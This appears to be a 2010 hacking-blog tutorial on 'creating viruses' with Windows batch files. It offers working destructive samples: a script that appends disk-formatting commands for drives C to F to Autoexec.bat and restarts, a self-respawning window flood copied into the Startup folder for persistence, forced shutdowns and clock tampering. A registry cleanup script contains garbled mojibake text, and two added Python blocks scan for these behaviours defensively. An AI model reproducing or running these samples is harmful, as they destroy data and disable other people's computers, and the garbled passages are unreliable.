Here I will teach you how to create viruses of various types and for various purposes. Let's
begin. The first virus I will explain turns the monitor off in such a way that the light at the
bottom of the monitor stays on, and no matter how many times you press the monitor's button you
still see nothing: neither the Desktop nor anything else. To make this virus I needed to create
two windows visually, both black, so that when you open the file the window covers the monitor and
nothing is visible on it. When we press the Windows and D keys one after the other, you know that
this closes every window in order to show the Desktop; after they are pressed the first black
window does close, but a second black window opens that does not let the Desktop appear. Along
with this I hid the so-called Taskbar, because the program needed this to work fully; to hide it I
had to find out the Taskbar's class, which is: Shell_TrayWnd. Besides this I needed to hide the
cursor, because this gave the virus more effect.
Downside: you can turn the virus off with Task Manager.

The next virus is the Skype virus. Its purpose is to change the title of the Skype window and to
keep moving the Skype window around. To create this virus we need to find out Skype's class, and
this class is: TApplication. In general, whenever we want to establish a connection with some
program we have to find out that program's class. As for changing the window's position, I
introduced a loop and a time element: I took 3 seconds, and within those 3 seconds the window has
to change position.
Downside: you can turn the virus off from the Task Manager process list.

Our next virus changes the position of the cursor. To create this virus I needed to find out the
cursor's coordinates; besides that I used a time element, so that at such-and-such a time the
cursor's location changed, and then I put all of this in a loop. Once this virus is started the
cursor changes position so fast that you cannot do anything.

Here are the sources of the viruses:
The viruses written here have to be made in a text document and then saved (Save As) as a .bat file.
This virus creates many folders
cls
md c:\aa
cls
md c:\aa2
cls
md c:\aa3
cls
md c:\aa4
cls
md c:\aa5
cls
md c:\aa6
cls
md c:\aa8
cls
md c:\aa9
cls
md c:\aa10
cls
md c:\aa11
cls
md c:\aa12
cls
md c:\aa13
cls
md c:\aa14
cls
md c:\aa15
cls
md c:\aa16
cls
md c:\aa17
cls
This virus messes up the clock
@ECHO OFF
cls
time 04:04
cls
cls
date 12/12/2220
cls
Here are the DOS commands needed to create a virus
taskkill /f /im explorer.exe (kills the process)
shutdown -r -t 60 (restarts in 60 seconds)
shutdown -l LOG OF (logs off)
format /y /q d: (formats, i.e. erases, D:\)
copy c:\visualhack\1.txt d:\visualhack\ (copying with cmd)
md c:\aa (creates the folder aa)
This virus will format all your disks and restart the computer
echo format /y /q d: >> c:\Autoexec.bat
echo format /y /q e: >> c:\Autoexec.bat
echo format /y /q f: >> c:\Autoexec.bat
echo format /y /q c: >> c:\Autoexec.bat
restart -r -c
Virus named: cd rom
cls
Echo Set oWMP = CreateObject("WMPlayer.OCX.7") >m.vbs
Echo Set colCDROMs = oWMP.cdromCollection >>m.vbs
Echo colCDROMs.Item(i).Eject >>m.vbs
Start M.vbs
cls
Virus named: kill
:metka
@start kill.bat
@echo -----www.lashatt.ucoz.com-----
@goto metka
Virus named: kill1
:metka
@start kill2.bat
@echo -----www.lashatt.ucoz.com-----
@goto metka
cls
copy kill2.bat C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs\Startup
cls
This virus shuts the computer down in 60 seconds and displays a text
shutdown -s -t 60 -c "lashatt.ucoz.com"
Virus named: Autorun deleter
@echo off
cls
echo.
echo *********** Delete Autorun batch file ***********
echo.
echo.
echo ¦¹ÀÉ®×°£¤F¦³§R°£Autorun.inf¨ÃÃö³¬Autorun¥\¯à¥~
echo ¥t¥~¦³§R°£MountPoints2¤º²§±`¾÷½Xªº¥\¯à
echo.
echo ==============================================
echo.
echo.
echo ¦¹§å¦¸Àɰõ¦æ«á·|Ãö³¬Autorun¥\¯à
echo.
echo ¦pªGn¦^´_Autorun¥\¯à«h½Ð±NÀɮשñ¸m¦bc:\«á
echo.
echo «ö¶}©l -^> °õ¦æ -^> ¿é¤Jc:\delautorun open«á«ö½T©w
echo.
echo ¨Ì·Ó°Ê§@«ü¥Ü¶]§¹«á§Y¥i¦^´_Autorun¥\¯à
echo.
echo.
echo ¦p¤£·Q°õ¦æ½Ð«öCTRL+C«á«öY¸õ¥X©Îª½±µ±Nµøµ¡Ãö³¬¡C
echo.
pause
cls
if not "%1"=="open" goto st
echo.
echo ¦^´_Autorun¥\¯à¨Ã§R°£Autorun.inf¸ê®Æ§¨
for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
attrib -r -s -h +a /D /S %%a:\autorun.inf >nul 2>nul
rd %%a:\autorun.inf >nul 2>nul&&echo.&&echo ²¾°£%%a:\Autorun.inf¸ê®Æ§¨
)
echo.
echo.
reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDriveAutoRun" /f >nul 2>nul
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x00000091 /f >nul 2>nul
reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x00000091 /f >nul 2>nul
reg.exe add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x00000091 /f >nul 2>nul
echo ³B²z§¹²¦½Ð«·s¶}¾÷
echo.
pause
exit
:st
if not exist c:\delauto goto delauto
if exist c:\delauto\usbmons.dll attrib -r -s -h -a %windir%\system32\usbmons.dll&del %windir%\system32\usbmons.dll >nul 2>nul&del c:\delauto\usbmons.dll >nul 2>nul
echo.
echo ²M²z«e¦¸°õ¦æ¦¹§å¦¸ÀɼȦsÀÉ©Mautorun.inf¸ê®Æ§¨
echo.
for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
attrib -r -s -h +a /D /S %%a:\autorun.inf >nul 2>nul
rd %%a:\autorun.inf >nul 2>nul
)
del c:\delauto\*.* /s /q >nul 2>nul
rd c:\delauto /s /q
:delauto
md c:\delauto
copy %windir%\regedit.exe c:\delauto\fixreg.exe >nul 2>nul
if not exist %windir%\system32\usbmons.dll goto disable
@echo Windows Registry Editor Version 5.00 >c:\delauto\fix.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\USB Monitor] >>c:\delauto\fix.reg
@echo "Driver"="usbmon.dll" >>c:\delauto\fix.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\USB Monitor] >>c:\delauto\fix.reg
@echo "Driver"="usbmon.dll" >>c:\delauto\fix.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Print\Monitors\USB Monitor] >>c:\delauto\fix.reg
@echo "Driver"="usbmon.dll" >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\usbmon >>c:\delauto\fix.reg
c:\delauto\fixreg.exe /s c:\delauto\fix.reg
attrib -r -s -h -a %windir%\system32\usbmons.dll >nul 2>nul
copy %windir%\system32\usbmons.dll c:\delauto\ >nul 2>nul
echo ½Ð©ó«·s¶}¾÷«á¦A°õ¦æ¤@¦¸¦¹µ{¦¡
echo.
pause
cls
:disable
echo.
echo ×´_ºÏºÐÂI¤£¶}©MÃö³¬autorun¥\¯à
reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveAutoRun /t REG_BINARY /d ffffff03 /f >nul 2>nul
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x000000Ff /f >nul 2>nul
reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x000000Ff /f >nul 2>nul
reg.exe add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x000000Ff /f >nul 2>nul
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2" /f >nul 2>nul
for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
if exist %%a:\autorun.inf echo.&echo §R°£%%a:\Autorun.inf
attrib -r -s -h -a %%a:\autorun.inf >nul 2>nul&del %%a:\autorun.inf /f /q >nul 2>nul
md %%a:\autorun.inf >nul 2>nul&&echo.&&echo ³Ð«Ø%%a:\Autorun.inf¸ê®Æ§¨&&attrib +r +s +h +a %%a:\autorun.inf >nul 2>nul&&echo. >>c:\delauto\autorun.txt&&fsutil fsinfo drivetype %%a: >>c:\delauto\autorun.txt&&dir/a %%a:\|find /i "autorun.inf" >> c:\delauto\autorun.txt
)
echo.
echo §R°£¸ê·½¦^¦¬±í¤º°õ¦æÀÉ
for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
for %%b in (EXE COM PIF) do (
attrib -r -s -h -a %%a:\RECYCLER\*.%%b /s >nul 2>nul&attrib -r -s -h -a %%a:\RECYCLED\*.%%b /s >nul 2>nul
del %%a:\recycler\*.%%b /s /q /f >nul 2>nul&del %%a:\recycled\*.%%b /s /q /f >nul 2>nul
))
@echo Windows Registry Editor Version 5.00 >c:\delauto\fix.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] >>c:\delauto\fix.reg
@echo "CheckedValue"=dword:00000001 >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EGHOST.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegEx.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.com] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NOD32.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQDoctor.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.com] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREng.EXE] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe] >>c:\delauto\fix.reg
c:\delauto\fixreg.exe /s c:\delauto\fix.reg
:last
copy %windir%\regedit.exe c:\delauto\fixreg.exe >nul 2>nul
c:\delauto\fixreg.exe /s c:\delauto\fix.reg
attrib -r -s -h -a c:\found.??? /S /D >nul 2>nul
del c:\found.???\*.* /s /q /f >nul 2>nul
rd c:\found.??? >nul 2>nul
echo.
echo ³B²z§¹²¦&pause
cls
echo.
echo ¥H¤U·|Åã¥Ü¦UºÏºÐ¤ºAutorun.inf¬O§_¬°¸ê®Æ§¨
echo ¦pªG¬O¦¹§å¦¸Àɫإߤ§¸ê®Æ§¨«h·|Åã¥ÜÃþ¦ü¹³¤U¦C¤å¦r
echo.
echo C: - ©T©w¦¡ºÏºÐ
echo %date% %time% ^<DIR^> autorun.inf
echo.
echo ¦pªG¨S¦³Åã¥Ü^<DIR^>³oÓ´XÓ¤å¦r«hªí¥ÜAutorun.inf§R°£¥¢±Ñ½ÐÀˬd¹q¸£¤º¨ä¥L¦a¤è¬O§_§t¦³¯f¬r
echo ¥t¥~¦pªG¬O¥úºÐ¾÷¤ºªºÀɮ׫h½Ð©¿²¤....
echo.
pause
echo.
type c:\delauto\autorun.txt|more
echo.
echo °õ¦æ§¹²¦½Ð«·s¶}¾÷¡C
echo.
pause
exit
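The script above writes two different NoDriveTypeAutoRun values: 0x91 in its "open" branch and 0xFF in its :disable branch. The following added example (not part of the original page) decodes that bitmask from such reg.exe lines and reports which drive types are left with AutoRun enabled; the function names and the short drive-type labels are this example's own.

```python
import re

# NoDriveTypeAutoRun is a bitmask: a set bit disables AutoRun for that drive type.
# The labels are descriptive names chosen for this example.
DRIVE_BITS = {
    0x01: "unknown", 0x02: "no-root-dir", 0x04: "removable", 0x08: "fixed",
    0x10: "network", 0x20: "cdrom", 0x40: "ramdisk", 0x80: "reserved",
}

REG_ADD = re.compile(
    r'reg(?:\.exe)?\s+add\s+"(?P<key>[^"]+)"\s+/v\s+"?NoDriveTypeAutoRun"?'
    r'\s+/t\s+REG_DWORD\s+/d\s+(?P<val>0x[0-9a-f]+)', re.I)

def autorun_enabled(mask):
    """Drive types whose bit is clear, i.e. AutoRun still fires for them."""
    return [name for bit, name in DRIVE_BITS.items() if not mask & bit]

def audit(script):
    """Return (hive, value, enabled drive types) for every policy write found."""
    rows = []
    for m in REG_ADD.finditer(script):
        hive = m.group("key").split("\\", 1)[0].upper()
        value = int(m.group("val"), 16)
        rows.append((hive, value, autorun_enabled(value)))
    return rows

def exposes_removable(script):
    """True if any write leaves AutoRun active for removable (USB) media."""
    return any("removable" in enabled for _, _, enabled in audit(script))

# Constructed input: one line from each branch of the script on this page.
RESTORE_BRANCH = r'''
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x00000091 /f >nul 2>nul
'''
DISABLE_BRANCH = r'''
reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x000000Ff /f >nul 2>nul
'''

if __name__ == "__main__":
    for branch in (RESTORE_BRANCH, DISABLE_BRANCH):
        for hive, value, enabled in audit(branch):
            print(f"{hive}: {value:#04x} leaves AutoRun on for {enabled or 'nothing'}")
```

Running it shows that the "open" branch re-enables AutoRun for removable, fixed and optical drives, while the :disable branch leaves it on for none.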
A virus that throws up many DOS windows (antivirus: taskkill /f /im cmd.exe)
start
filename.bat
This is a memory virus
@ECHO OFF
REM <<< code: jmp installation, int_21 handler part 1 >>>
copy %0 b.com>nul
b.com
del b.com
rem <<< code: TSR installation, int_21 handler part 2 >>>
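For triage of untrusted .bat files, the behaviours in the batch samples on this page can be turned into static indicators. The following is an added example, not part of the original page: a small scanner whose rule names and regular expressions are this example's own, run over constructed inputs assembled from lines quoted above.

```python
import re

# Line-level indicators for the behaviours the samples on this page show.
LINE_RULES = {
    "destructive-format": re.compile(r"\bformat\b.*(?:/q|/y)\b"),
    "boot-script-write": re.compile(r">>?\s*c:\\autoexec\.bat"),
    "startup-persistence": re.compile(r"\\(?:startm~1|start menu)\\programs\\startup"),
    "forced-shutdown": re.compile(r"\bshutdown\s+(?:.*\s)?[-/][srl]\b"),
    "clock-tamper": re.compile(r"^(?:time|date)\s+\d"),
    "shell-kill": re.compile(r"\btaskkill\b.*\bexplorer\.exe"),
}

def normalise(line):
    """Lower-case a batch line and drop the leading '@' echo suppressor."""
    return line.strip().lstrip("@").strip().lower()

def triage(text):
    """Return sorted (line_number, rule) findings for one batch file."""
    lines = [normalise(l) for l in text.splitlines()]
    findings, labels = set(), {}
    for no, line in enumerate(lines, 1):
        for rule, rx in LINE_RULES.items():
            if rx.search(line):
                findings.add((no, rule))
        if line.startswith(":"):
            labels[line[1:].strip()] = no
        elif line.startswith("goto "):
            start = labels.get(line[5:].strip().lstrip(":"))
            # A backward jump whose loop body launches a process never ends:
            # the window-flooding pattern of the "kill" samples.
            if start and any(l.startswith("start ") for l in lines[start:no - 1]):
                findings.add((no, "respawn-loop"))
    return sorted(findings)

# Constructed test inputs, assembled from lines quoted on this page.
SAMPLE_KILL1 = """:metka
@start kill2.bat
@echo -----www.lashatt.ucoz.com-----
@goto metka
cls
copy kill2.bat C:\\DOCUME~1\\ALLUSE~1\\STARTM~1\\Programs\\Startup
"""
SAMPLE_WIPE = "echo format /y /q d: >> c:\\Autoexec.bat\nshutdown -s -t 60 -c \"x\"\n"
SAMPLE_BENIGN = "@echo off\nmd c:\\backup\ngoto end\n:end\n"

if __name__ == "__main__":
    for name in ("SAMPLE_KILL1", "SAMPLE_WIPE", "SAMPLE_BENIGN"):
        print(name, triage(globals()[name]))
```

The forward `goto` in the benign sample is not flagged, because only a jump back to an earlier label with a `start` in between forms the respawn loop.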
Thursday, 04.22.2010